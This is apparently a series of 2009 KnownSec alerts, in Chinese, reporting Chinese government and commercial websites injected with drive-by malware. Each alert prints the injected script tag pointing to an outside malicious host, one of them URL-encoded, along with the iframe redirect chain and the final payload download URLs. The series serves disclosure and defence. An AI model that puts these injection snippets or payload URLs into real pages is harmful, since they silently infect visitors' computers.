知道创宇

发布时间：Tue Jun 30 2009 19:15:55 UTC+0800
最后更新时间：Tue Jun 30 2009 19:15:55 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 黑龙江省鸡西市政府采购网（http://www.jx-zfcg.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jx-zfcg.gov.cn/

网页被嵌入恶意链接代码：

<script src=http://cddzfx.com/n.js></script>
挂马分析：
[wide]http://www.jx-zfcg.gov.cn/
 [script]http://msfx.cn/n.js
 [script]http://cddzfx.com/n.js
  [frame]http://jkasd.8800.org:338/a0036159/a03.htm
   [frame]http://jkasd.8800.org:338/a0036159/new.html
    [script]http://jkasd.8800.org:338/a0036159/../xnnn.js
    [script]http://jkasd.8800.org:338/a0036159/../zhin.js
     [frame]http://jkasd.8800.org:338/a0036159/../../lzz.htm
     [frame]http://jkasd.8800.org:338/a0036159/../../as.htm
     [frame]http://jkasd.8800.org:338/a0036159/../../bfyy.htm
    [frame]http://jkasd.8800.org:338/a0036159/../apple4.htm
    [frame]http://jkasd.8800.org:338/a0036159/fx.htm
    [frame]http://jkasd.8800.org:338/a0036159/../active.htm
    [frame]http://jkasd.8800.org:338/a0036159/../cx.htm
    [frame]http://jkasd.8800.org:338/a0036159/../real10.htm
    [frame]http://jkasd.8800.org:338/a0036159/../real11.htm
    [script]http://jkasd.8800.org:338/a0036159/../wewew.js
   [frame]http://jkasd.8800.org:338/a0036159/new.html
   [script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
最终下载病毒文件：
http://x9s7b.cn:8808/a/lzz.css
http://x9s7b.cn:8808/a/as.css
http://x9s7b.cn:8808/a/bf.css
http://x9s7b.cn:8808/a/ms.css
http://x9s7b.cn:8808/a/re.css
http://x9s7b.cn:8808/a/real11.css
http://x9s7b.cn:8808/Baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：40
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Tue Jun 30 2009 19:12:15 UTC+0800
最后更新时间：Tue Jun 30 2009 19:12:15 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中共沈阳市委宣传部（http://www.syxcb.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.syxcb.gov.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://cnn.vu.cx/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://www.syxcb.gov.cn/
 [script]http://cnn.vu.cx/js.js?google_ad=10×90_as
  [frame]http://www.czmtv.net/gxb/360.htm
   [frame]http://www.czmtv.net/gxb/x.htm
    [script]http://www.czmtv.net/gxb/all.css
    [frame]http://www.czmtv.net/gxb/1.htm
    [frame]http://www.czmtv.net/gxb/office.htm
    [frame]http://www.czmtv.net/gxb/newlz.htm
    [frame]http://www.czmtv.net/gxb/s.htm
    [frame]http://www.czmtv.net/gxb/bf.htm
    [frame]http://www.czmtv.net/gxb/cx.htm
    [frame]http://www.czmtv.net/gxb/2.htm
    [frame]http://www.czmtv.net/gxb/pp.htm
    [frame]http://www.czmtv.net/gxb/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件：
http://mvt.1s.fr/a.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Tue Jun 30 2009 19:09:13 UTC+0800
最后更新时间：Tue Jun 30 2009 19:09:13 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 吉首市地方税务局（http://www.jssds.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jssds.gov.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://sina.ch.ma/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://www.jssds.gov.cn/
 [script]http://sina.ch.ma/js.js?google_ad=10×90_as
  [frame]http://www.czmtv.net/gxb/360.htm
   [frame]http://www.czmtv.net/gxb/x.htm
    [script]http://www.czmtv.net/gxb/all.css
    [frame]http://www.czmtv.net/gxb/1.htm
    [frame]http://www.czmtv.net/gxb/office.htm
    [frame]http://www.czmtv.net/gxb/newlz.htm
    [frame]http://www.czmtv.net/gxb/s.htm
    [frame]http://www.czmtv.net/gxb/bf.htm
    [frame]http://www.czmtv.net/gxb/cx.htm
    [frame]http://www.czmtv.net/gxb/2.htm
    [frame]http://www.czmtv.net/gxb/pp.htm
    [frame]http://www.czmtv.net/gxb/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件：
http://mvt.1s.fr/a.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：5
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Sun Jun 28 2009 20:31:19 UTC+0800
最后更新时间：Sun Jun 28 2009 20:31:19 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国民主同盟安徽省委员会（http://www.ahmm.gov.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.ahmm.gov.cn/

网页被嵌入恶意链接代码：

<script language=javascript src=http://cnn.vu.cx/js.js?google_ad=10×90_as></script>
挂马分析：
[wide]http://www.ahmm.gov.cn/
 [script]http://cnn.vu.cx/js.js?google_ad=10×90_as
  [frame]http://www.czmtv.net/b/360.htm
   [frame]http://www.czmtv.net/b/x.htm
    [script]http://www.czmtv.net/b/all.css
    [frame]http://www.czmtv.net/b/1.htm
    [frame]http://www.czmtv.net/b/office.htm
    [frame]http://www.czmtv.net/b/newlz.htm
    [frame]http://www.czmtv.net/b/s.htm
    [frame]http://www.czmtv.net/b/bf.htm
    [frame]http://www.czmtv.net/b/cx.htm
    [frame]http://www.czmtv.net/b/2.htm
    [frame]http://www.czmtv.net/b/pp.htm
    [frame]http://www.czmtv.net/b/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件：
http://mvt.be.ma/a.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Sun Jun 28 2009 20:24:54 UTC+0800
最后更新时间：Sun Jun 28 2009 20:24:54 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 重庆人才招聘网（http://www.tzdian.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.tzdian.com/

网页被嵌入恶意链接代码：

<script src=http://3b3.org/c.js></script>
挂马分析：
[wide]http://www.tzdian.com/
 [script]http://3b3.org/c.js
  [frame]http://vpsvip.com/aa/a100.htm
   [frame]http://vpsvip.com/aa/index.htm
    [frame]http://vpsvip.com/aa/flash.htm
    [frame]http://vpsvip.com/aa/a44.htm
    [frame]http://vpsvip.com/aa/office.htm
    [frame]http://vpsvip.com/aa/02.htm
   [script]http://js.tongji.cn.yahoo.com/1083501/ystat.js
   [script]http://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
  [script]http://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件：
http://milllk.com/wm/svchost.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Sat Jun 27 2009 20:42:54 UTC+0800
最后更新时间：Sat Jun 27 2009 20:42:54 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国音乐互动网（http://www.cnmtv.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.news.cnmtv.com.cn/

网页被嵌入恶意链接代码：

<script src=http://cddzfx.com/n.js></script>
挂马分析：
[wide]http://www.news.cnmtv.com.cn/
 [script]http://cddzfx.com/n.js
  [frame]http://ttfghvas.3322.org:338/a0036159/a03.htm
   [frame]http://ttfghvas.3322.org:338/a0036159/new.html
    [script]http://ttfghvas.3322.org:338/a0036159/../xnnn.js
    [script]http://ttfghvas.3322.org:338/a0036159/../zhin.js
     [frame]http://ttfghvas.3322.org:338/a0036159/../../lzz.htm
     [frame]http://ttfghvas.3322.org:338/a0036159/../../as.htm
     [frame]http://ttfghvas.3322.org:338/a0036159/../../bfyy.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/../apple4.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/fx.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/../active.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/../cx.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/../real10.htm
    [frame]http://ttfghvas.3322.org:338/a0036159/../real11.htm
    [script]http://ttfghvas.3322.org:338/a0036159/../wewew.js
   [frame]http://ttfghvas.3322.org:338/a0036159/new.html
   [script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
最终下载病毒文件：
http://x9s7b.cn:8808/a/lzz.css
http://x9s7b.cn:8808/a/as.css
http://x9s7b.cn:8808/a/bf.css
http://x9s7b.cn:8808/a/ms.css
http://x9s7b.cn:8808/a/re.css
http://x9s7b.cn:8808/a/real11.css
http://x9s7b.cn:8808/Baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：21
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Sat Jun 27 2009 20:36:42 UTC+0800
最后更新时间：Sat Jun 27 2009 20:36:42 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国票务网（http://www.piao.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.piao.com/c_lvyou/index.asp

网页被嵌入恶意链接代码：

<script src=http://3b3.org/c.js></script>
挂马分析：
[wide]http://www.piao.com/c_lvyou/index.asp
 [script]http://3b3.org/c.js
  [frame]http://vpsvip.com/aa/a100.htm
   [frame]http://vpsvip.com/aa/index.htm
    [frame]http://vpsvip.com/aa/flash.htm
    [frame]http://vpsvip.com/aa/a44.htm
    [frame]http://vpsvip.com/aa/office.htm
    [frame]http://vpsvip.com/aa/02.htm
   [script]http://js.tongji.cn.yahoo.com/1083501/ystat.js
   [script]http://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
  [script]http://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件：
http://milllk.com/wm/svchost.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：16
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Fri Jun 26 2009 15:35:59 UTC+0800
最后更新时间：Fri Jun 26 2009 15:35:59 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国信息安全博士网（http://www.secdoctor.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.secdoctor.cn/

网页被嵌入恶意链接代码：

document.writeln(’<script src=http://ufy9g1.chinaw3.com/j/top.js></script>’)
挂马分析：
[wide]http://www.secdoctor.cn/
 [script]http://www.secdoctor.cn//include/dedeajax2.js
  [script]http://ufy9g1.chinaw3.com/j/top.js
   [frame]http://nizhuya.3322.org:338/b165439/b16.htm
    [frame]http://nizhuya.3322.org:338/b165439/new.html
     [script]http://nizhuya.3322.org:338/b165439/../xnnn.js
     [script]http://nizhuya.3322.org:338/b165439/../zhin.js
     [frame]http://nizhuya.3322.org:338/b165439/../apple4.htm
     [frame]http://nizhuya.3322.org:338/b165439/fx.htm
     [frame]http://nizhuya.3322.org:338/b165439/../active.htm
     [frame]http://nizhuya.3322.org:338/b165439/../cx.htm
     [frame]http://nizhuya.3322.org:338/b165439/../real10.htm
     [frame]http://nizhuya.3322.org:338/b165439/../real11.htm
     [script]http://nizhuya.3322.org:338/b165439/../wewew.js
    [frame]http://nizhuya.3322.org:338/b165439/new.html
    [script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
   [script]http://js.tongji.cn.yahoo.com/903009/ystat.js
最终下载病毒文件：
http://x9s7b.cn:8808/a/lzz.css
http://x9s7b.cn:8808/a/as.css
http://x9s7b.cn:8808/a/bf.css
http://x9s7b.cn:8808/a/ms.css
http://x9s7b.cn:8808/a/re.css
http://x9s7b.cn:8808/a/real11.css
http://x9s7b.cn:8808/Baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Fri Jun 26 2009 15:30:43 UTC+0800
最后更新时间：Fri Jun 26 2009 15:30:43 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 刘亦菲中文网（http://www.lyfcn.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bbs.lyfcn.net/

网页被嵌入恶意链接代码：

<script src=”http://www.cb71.cn/a.js” type=”text/javascript”></script>
挂马分析：
[wide]http://bbs.lyfcn.net/
 [script]http://www.cb71.cn/a.js
  [script]http://count2.51yes.com/click.aspx?id=23472525&logo=1
  [frame]http://lciejqe.cn/01/0001.htm?guaig
   [frame]http://lciejqe.cn/01/1.html
    [frame]http://lciejqe.cn/01/ct14.htm
    [frame]http://lciejqe.cn/01/ctfl.htm
    [frame]http://lciejqe.cn/01/z.htm
    [frame]http://lciejqe.cn/01/ctvod.htm
    [frame]http://lciejqe.cn/01/ctxxz.htm
    [frame]http://lciejqe.cn/01/ctqm.htm
    [frame]http://lciejqe.cn/01/ctlb.htm
    [frame]http://lciejqe.cn/01/ct122121.htm
   [script]http://js.tongji.linezing.com/1098038/tongji.js
最终下载病毒文件：
http://ddggbb.cn/c1.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Fri Jun 26 2009 15:27:19 UTC+0800
最后更新时间：Fri Jun 26 2009 15:27:19 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 火狐游戏网（http://www.skyhu.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://mh.skyhu.com/js/ad.js

网页被嵌入恶意链接代码：

document.write(’<script src=http://%77%77%77%2E%63%6E%76%2E%6F%72%67%2E%63%6E/%70%6F%70%2E%67%69%66></script>’)
挂马分析：
[wide]http://mh.skyhu.com/
 [script]http://mh.skyhu.com/js/ad.js
  [script]http://%77%77%77%2e%63%6e%76%2e%6f%72%67%2e%63%6e/%70%6f%70%2e%67%69%66
   [frame]http://lciejqe.cn/08/0008.htm?22
    [frame]http://lciejqe.cn/08/index.html
     [frame]http://lciejqe.cn/08/ct14.htm
     [frame]http://lciejqe.cn/08/ctfl.htm
     [frame]http://lciejqe.cn/08/z.htm
     [frame]http://lciejqe.cn/08/ctvod.htm
     [frame]http://lciejqe.cn/08/ctxxz.htm
     [frame]http://lciejqe.cn/08/ctqm.htm
     [frame]http://lciejqe.cn/08/ctlb.htm
     [frame]http://lciejqe.cn/08/ct122121.htm
    [script]http://js.tongji.linezing.com/1116244/tongji.js
最终下载病毒文件：
http://ddggbb.cn/c8.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：9
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]